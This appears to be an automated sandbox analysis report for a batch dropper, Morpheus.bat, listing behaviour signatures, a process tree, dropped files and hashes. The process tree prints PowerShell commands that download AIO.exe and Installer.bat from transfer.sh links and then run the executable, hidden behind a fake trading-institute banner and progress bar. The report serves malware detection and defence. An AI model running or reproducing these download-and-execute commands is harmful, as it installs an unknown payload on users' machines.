cfe8b67cc2046f6c85e068f77498d85be2198bd69615d9c3746fac87fba51357

Analysis

max time kernel
90s
max time network
98s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
24/09/2022, 08:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Morpheus.bat
Size

1KB
MD5

dd90d98586b3c4efc4893ee2d8352e76
SHA1

9a2181410f22f8c33da2ee533ffc3052122e2d69
SHA256

cfe8b67cc2046f6c85e068f77498d85be2198bd69615d9c3746fac87fba51357
SHA512

8a7278e295ac33542f2fc5f247f6540c3db373852039c28d81fc050d8dee846cd722a33acc071a0957f2f6de04c582780dd3da0f9a255affdfb024f03f32f583

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	2368	powershell.exe
26	1328	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4748	AIO.exe

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
2184	timeout.exe
4040	timeout.exe
760	timeout.exe
3148	timeout.exe
2168	timeout.exe
996	timeout.exe
1400	timeout.exe
3160	timeout.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
220	powershell.exe
220	powershell.exe
2368	powershell.exe
2368	powershell.exe
1328	powershell.exe
1328	powershell.exe
1248	powershell.exe
1248	powershell.exe
2004	powershell.exe
2004	powershell.exe
5008	powershell.exe
5008	powershell.exe
4956	powershell.exe
4956	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4868 wrote to memory of 220	4868	cmd.exe	85
PID 4868 wrote to memory of 220	4868	cmd.exe	85
PID 4868 wrote to memory of 3148	4868	cmd.exe	86
PID 4868 wrote to memory of 3148	4868	cmd.exe	86
PID 4868 wrote to memory of 2368	4868	cmd.exe	88
PID 4868 wrote to memory of 2368	4868	cmd.exe	88
PID 4868 wrote to memory of 1328	4868	cmd.exe	95
PID 4868 wrote to memory of 1328	4868	cmd.exe	95
PID 4868 wrote to memory of 2168	4868	cmd.exe	96
PID 4868 wrote to memory of 2168	4868	cmd.exe	96
PID 4868 wrote to memory of 4748	4868	cmd.exe	97
PID 4868 wrote to memory of 4748	4868	cmd.exe	97
PID 4868 wrote to memory of 1248	4868	cmd.exe	99
PID 4868 wrote to memory of 1248	4868	cmd.exe	99
PID 4868 wrote to memory of 996	4868	cmd.exe	100
PID 4868 wrote to memory of 996	4868	cmd.exe	100
PID 4868 wrote to memory of 2004	4868	cmd.exe	101
PID 4868 wrote to memory of 2004	4868	cmd.exe	101
PID 4868 wrote to memory of 1400	4868	cmd.exe	102
PID 4868 wrote to memory of 1400	4868	cmd.exe	102
PID 4868 wrote to memory of 5008	4868	cmd.exe	103
PID 4868 wrote to memory of 5008	4868	cmd.exe	103
PID 4868 wrote to memory of 3160	4868	cmd.exe	104
PID 4868 wrote to memory of 3160	4868	cmd.exe	104
PID 4868 wrote to memory of 4956	4868	cmd.exe	106
PID 4868 wrote to memory of 4956	4868	cmd.exe	106
PID 4868 wrote to memory of 2184	4868	cmd.exe	107
PID 4868 wrote to memory of 2184	4868	cmd.exe	107
PID 4868 wrote to memory of 4040	4868	cmd.exe	108
PID 4868 wrote to memory of 4040	4868	cmd.exe	108
PID 4868 wrote to memory of 760	4868	cmd.exe	109
PID 4868 wrote to memory of 760	4868	cmd.exe	109

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Morpheus.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor Green MORPHEUS TRADING INSTITUTE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:220
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://transfer.sh/get/03vnqq/AIO.exe -OutFile AIO.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://transfer.sh/get/JewXvm/Installer.bat -OutFile Installer.bat"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2168
- C:\Users\Public\AIO.exe
  C:\Users\Public\AIO.exe
  2⤵
  - Executes dropped EXE
  PID:4748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: --- 25
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1248
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: ------ 50
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: --------- 75
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: ------------ 100
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4956
- C:\Windows\system32\timeout.exe
  timeout /t 4 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2184
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4040
- C:\Windows\system32\timeout.exe
  timeout /t 4 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:760

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8677f0757115e9eed48ed9172d27dc88

SHA1
b2db14fb2e445034b149a9af6043b805274b46e7

SHA256
9262f26be7b03ae6fecadbbf5a04d2ceb228e645d29b0b35dc433bd3dbd48e35

SHA512
c6f4e93f26afb6b1b3afba2cc4a1043fdbb1cb91dcc3cc766a52b66fcec7f478a27c1465fa85cef5cd9cc613e234a6191f93b2a4ec921a6b0b8a10aaf128834a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
63f1806e1f04fdefb34b87159a04e9ab

SHA1
02689ca3a779e3824df22b70cf5a53423b68f73b

SHA256
131453f768f89c9c7723cc7033df9506f77822d7e9456c24c886056cf974523e

SHA512
cfeab069b2004b42c8cbffc037915cc19ddf07c775a2e3c47c3313e76c339640734367c8a839806787a8d43ea94a4e2d374b1b01a698e6750184fb0fb11b5d97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
26d3c4a005c6957c189ac0776af4bfbb

SHA1
eed77d7fa8dcf35a698141b93e507a9f2ca0e604

SHA256
4e9a6f486898e04e09e9b5745bf0b114369f6e7b411d7c7f710d0b0ebc3bfb5c

SHA512
0f5b15b37ae2d229c3b72029b253670c4b1b2accc02d2246aaf1f1806a6def92e0095e371fdc650c8d011a35725343d3381a302bd4adf296d7b2aa8f953cff45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc28168b916bf9744961653d503e1164

SHA1
71deadab13b81a414582f931e9af010152463644

SHA256
a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9

SHA512
08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a3af0fe7f6bead950f076de281a5a1d2

SHA1
e55d189a5525b7871835548e5f777de0ff42e755

SHA256
ce484ca22f8966e31b9b5aafef1a970d37525122fb7c9d39976e743264f77890

SHA512
9818ad2387ceba8fe3afbe60070354c39eb13783653e8e28c84bd7e61678627942a6df06778d4e4b72d525c843d74bd97e4edc93af960e45500912e41c2c5693

Download Submit
C:\Users\Admin\AppData\Local\Temp\AIO.exe

Filesize
3.9MB

MD5
9c1181704c48d62de14c5f682c4f5d5e

SHA1
ada9921624f3225054745643b0d4504939efd1aa

SHA256
44ea8ae385d7d95d4f0b9c6969c0d0ca55acfd996e97236c0ae04eb2b4b2d623

SHA512
42756ad205c3e99b3a9c0eda1dbaa80923b714ab56e9ab987917e6a41b52571f6965254ee9dc486c2e444d080554956ad4059ca5695d36de53d92201583e4f05

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installer.bat

Filesize
149B

MD5
da22c5d6eec43879d2cb81503a6e108e

SHA1
dd816d884319d69b83365eb4111bce251780279c

SHA256
faefc46e8a09a0e3d86e468d86974096e0f8f5ceeb20135064f2a4c3560bb761

SHA512
52e50624436753d6e0f826ac1f94f66dace9a24e903f66736653c70cb852e625bd69d7710a9615e40727fb7f31c281cdbad697a9273a45e811fa80f463b3b3cd

Download Submit
C:\Users\Public\AIO.exe

Filesize
3.9MB

MD5
9c1181704c48d62de14c5f682c4f5d5e

SHA1
ada9921624f3225054745643b0d4504939efd1aa

SHA256
44ea8ae385d7d95d4f0b9c6969c0d0ca55acfd996e97236c0ae04eb2b4b2d623

SHA512
42756ad205c3e99b3a9c0eda1dbaa80923b714ab56e9ab987917e6a41b52571f6965254ee9dc486c2e444d080554956ad4059ca5695d36de53d92201583e4f05

Download Submit
memory/220-135-0x00007FF8F91A0000-0x00007FF8F9C61000-memory.dmp

Filesize
10.8MB

Download
memory/220-133-0x000001BC4EC10000-0x000001BC4EC32000-memory.dmp

Filesize
136KB

Download
memory/220-134-0x00007FF8F91A0000-0x00007FF8F9C61000-memory.dmp

Filesize
10.8MB

Download
memory/1248-154-0x00007FF8F8650000-0x00007FF8F9111000-memory.dmp

Filesize
10.8MB

Download
memory/1328-145-0x00007FF8F8650000-0x00007FF8F9111000-memory.dmp

Filesize
10.8MB

Download
memory/1328-146-0x00007FF8F8650000-0x00007FF8F9111000-memory.dmp

Filesize
10.8MB

Download
memory/2004-158-0x00007FF8F8650000-0x00007FF8F9111000-memory.dmp

Filesize
10.8MB

Download
memory/2368-141-0x00007FF8F82E0000-0x00007FF8F8DA1000-memory.dmp

Filesize
10.8MB

Download
memory/2368-142-0x00007FF8F82E0000-0x00007FF8F8DA1000-memory.dmp

Filesize
10.8MB

Download
memory/2368-140-0x00007FF8F82E0000-0x00007FF8F8DA1000-memory.dmp

Filesize
10.8MB

Download
memory/4956-166-0x00007FF8F8650000-0x00007FF8F9111000-memory.dmp

Filesize
10.8MB

Download
memory/5008-162-0x00007FF8F8650000-0x00007FF8F9111000-memory.dmp

Filesize
10.8MB

Download